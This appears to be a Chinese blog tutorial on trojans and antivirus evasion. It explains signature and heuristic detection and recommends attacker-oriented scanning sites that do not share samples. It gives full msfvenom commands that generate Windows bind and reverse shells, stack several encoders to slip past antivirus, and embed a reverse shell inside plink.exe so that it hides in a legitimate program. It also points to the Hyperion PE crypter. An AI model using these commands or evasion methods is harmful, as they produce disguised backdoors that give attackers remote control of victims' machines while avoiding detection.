1.木马病毒和免杀技术

其他 2020-04-17 10:45:42 阅读次数: 0

第17章 免杀

杀毒软件

  1. 叫杀毒软件变成了防病毒软件

    • 为什么叫防病毒软件
      • 应为做的黑客做出来木马病毒运行在很底层
      • 在开机运行之前木马病毒就在引导的时候已经启动了所以杀毒软件杀不了他
    • 企业的防病毒软件
      • 企业的防病毒软件都有一个单独的控制台
      • 控制台就可以控制企业下面的所以设备的安全

  2. 杀毒软件的原理

    1. 杀毒软件的有一个病毒库,里面存放着特征码
    2. 基于对二进制的文件或者对数据包进行还原后的里面的特征字符进行比较
    3. 还有行为分析比如修改你的注册表,插入进程里面,修改你的文件等等等方法就叫<启发式>

免杀技术

  1. 免杀技术有两大种
    现在还有的黑客进行逆向分析杀毒软件,看你的杀毒软件是怎么进行分析的
    1. 修改
      1. 如果一个黑客知道那个杀毒软件的厂商,定义病毒的特点
        就可以进行用二进行修改,替换等等等达到免杀技术
    2. 2.加密技术(crypter)
      1. 通过加密使得特征字符不可读,来逃避查杀
      2. 还有叫木马程序注入到MP3里面,还照片里面
  2. FUD是全免杀技术
  3. 查杀网站
    1. 下面是明查杀网站,他们会共享给杀毒软件,进行分享然后在加入特征库
      https://www.virustotal.com/
      http://www.virscan.org/
    2. 搞黑的
      https://nodistribute.com/
      http://viruscheckmate.com/check/

1.生成木马

1.生成反弹shell

msfvenom -p windows/shell/bind_tcp lhost=1.1.1.1 lport=4444 -a x86 --platform win -f exe -o a.exe

-p 选择一个绑定tcp端口的shell , -a 选择操作系统的架构
–platform 指定的平台,win就是windows系统
-f以exe格式输出 -o输出成a.exe

  1. 加密编码反弹 shell

     msfvenom -p windows/shell/bind_tcp lhost=1.1.1.1lport=4444 -f raw -e x86/shikata_ga_nai -i 5 | msfvenom -a x86 --platform windows -e x86/countdown -i 8  -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 9 -b '\x00' -f exe -o b.exe

    raw进行加密编码 , -e是指定的是x86/shikata_ga_nai模块
    -i 5就是这个x86/shikata_ga_nai模块加密5次 ,在用管道在用x86/countdown模块进行8次加密,在用x86/shikata_ga_nai模块在加密9次
    -b 过滤字符
    生成
    在这里插入图片描述
    发现加密和不加密的大小一样,看一下md5是一样的
    用md5sum工具在这里插入图片描述
    strings工具可以查看程序可读的内容
    在这里插入图片描述

  2. 查看一下用在线病毒查杀看一下加密和不加密的
    在线查杀病毒就是居于特征码的,在系统完全安装杀毒软件不这个要准确

    1. 查看一下没有加密的 有49个有25个检查出了了
      在这里插入图片描述
    2. 查看一下加了密的 有49个有25个检查出了了,效果几乎一样
      在这里插入图片描述

2.利用模板隐藏 shell

利用无害的应用程序作为模板,叫恶意的代码附着上去

  1. 利用模板隐藏 shell

    msfvenom -p windows/shell_reverse_tcp -x /usr/share/windows-binaries/plink.exe lhost=1.1.1.1 lport=4444 -a x86 --platform win -f exe -o c.exe

    -x 指定一个模板/usr/share/windows-binaries/plink.exe就是kali自带的win系统的执行程序
    其他参数上面说
    在这里插入图片描述

  2. 模板隐藏 shell进行加密

    msfvenom -p windows/shell/bind_tcp -x /usr/share/windows-binaries/plink.exe lhost=1.1.1.1 lport=4444 -e x86/shikata_ga_nai -i 5 -a x86 --platform win -f exe > d.exe

  3. 查看一下用在线病毒查杀看一下加密和不加密的

    1. 查看一下没有加密的 有49个有21个检查出了了
      在这里插入图片描述
    2. 查看一下加了密的 有49个有21个检查出了了,效果几乎一样
      在这里插入图片描述

3.软件保护

软件开发商为保护版权,采用的混淆和加密技术避免盗版逆向软件

  1. Hyperion (32bit PE 程序加密器)工具
    他是专门针对32位的PE程序
    他有两个模块Crypter (加密器)和Container(解密器)
    下载地址在有很个个版本:https://github.com/nullsecuritynet/tools/tree/master/binary/hyperion/release

作者 QQ2737977997

赵彪、
发布了41 篇原创文章 · 获赞 15 · 访问量 8858
私信 关注

猜你喜欢

转载自blog.csdn.net/qq_41860876/article/details/105218073
今日推荐
国产云输入法——仅华为无云端数据上传安全问题
开源日报 | 工业开源项目OGG 1.0;姐姐,你要和我一起配置火狐吗;苹果AI遥遥落后?Fedora 40
开放签电子签章:停止新增,优化体验,前进更进(五一假期前工作)
开源日报 | 中学生开源前端动画引擎;全球首个Llama3 8B中文版开源模型;联想电脑恐出局;Linus讽刺AI炒作
“百模大战”必有一战 | 2024中国“百模大战”竞争格局分析
最强开源大模型 Llama 3 上架 Gitee AI
周排行
自媒体文章如何提高原创度以及如何检测原创度
开启qq邮箱的smtp服务
Qt程序单次启动(QSingleApplication类)
国外的外包网站
更新IDEA主题——放飞代码风格
cocos2dx 实现搓牌效果(翻牌效果),包括铺平动画
dict和json之间的互相转换
angular的一些思考
. Fibonacci数列是这样定义的: F[0] = 0 F[1] = 1 for each i ≥ 2: F[i] = F[i-1] + F[i-2] 因此,Fibonacci数列就形如:0, 1
洛谷P1064 金明的预算方案
每日归档
更多
2024-04-25(22)
2024-04-24(36)
2024-04-23(26)
2024-04-22(39)
2024-04-21(0)
2024-04-20(6)
2024-04-19(5)
2024-04-18(0)
2024-04-17(5)
2024-04-16(70)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022